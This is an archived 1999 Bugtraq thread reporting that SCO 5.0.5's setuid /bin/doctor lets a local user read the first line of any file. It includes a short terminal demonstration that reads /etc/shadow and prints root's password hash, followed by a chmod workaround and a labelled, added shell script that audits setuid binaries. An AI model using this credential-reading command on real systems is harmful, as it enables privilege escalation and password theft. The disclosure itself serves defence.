Bugtraq mailing list archives

Re: SCO 5.0.5 /bin/doctor local root compromise
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Wed, 8 Sep 1999 11:31:57 -0700


confirmed to run under 5.0.4 as well.

On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
Greetings,


INFO:
 There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor
script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:
 Just chmod -s until SCO comes out with a fix.  Although I certainly won't be changing it back to suid root anytime
soon.  If a hole like this exists, there are undoubtedly countless more lurking within.

Brock Tellier
Systems Administrator
Webley Systems

--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
Hi! I'm a .signature virus! Copy me into
your ~/.signature to help me spread!
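A small POSIX shell audit for the "chmod -s" workaround the post describes, added here as an example and not code from the thread; the allowlist contents and the directories searched are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original Bugtraq thread: find set-user-ID
# binaries and apply the "chmod -s" workaround suggested for /bin/doctor.
# SUID_ALLOWLIST and the directories in audit_dirs are illustrative assumptions.

# Return 0 if the file carries the set-user-ID bit, 1 otherwise (POSIX test -u).
is_setuid() {
    [ -u "$1" ]
}

# Binaries that legitimately need setuid and should not be reported.
SUID_ALLOWLIST="${SUID_ALLOWLIST:-/bin/su /bin/passwd}"

# Print "path owner" for each argument that is setuid and not allowlisted.
list_setuid() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        is_setuid "$f" || continue
        case " $SUID_ALLOWLIST " in
            *" $f "*) continue ;;
        esac
        owner=$(ls -ld "$f" | awk '{print $3}')
        printf '%s %s\n' "$f" "$owner"
    done
}

# Walk the given directories and report every unexpected setuid file.
audit_dirs() {
    list_setuid $(find "$@" -type f -perm -4000 2>/dev/null)
}

# Clear setuid/setgid on a file (the post's interim fix for /bin/doctor);
# succeeds only if the setuid bit is really gone afterwards.
drop_setuid() {
    chmod u-s,g-s "$1" && ! is_setuid "$1"
}

# Typical use on the affected host:
#   audit_dirs /bin /usr/bin          # report, e.g. "/bin/doctor root"
#   drop_setuid /bin/doctor           # apply the workaround
```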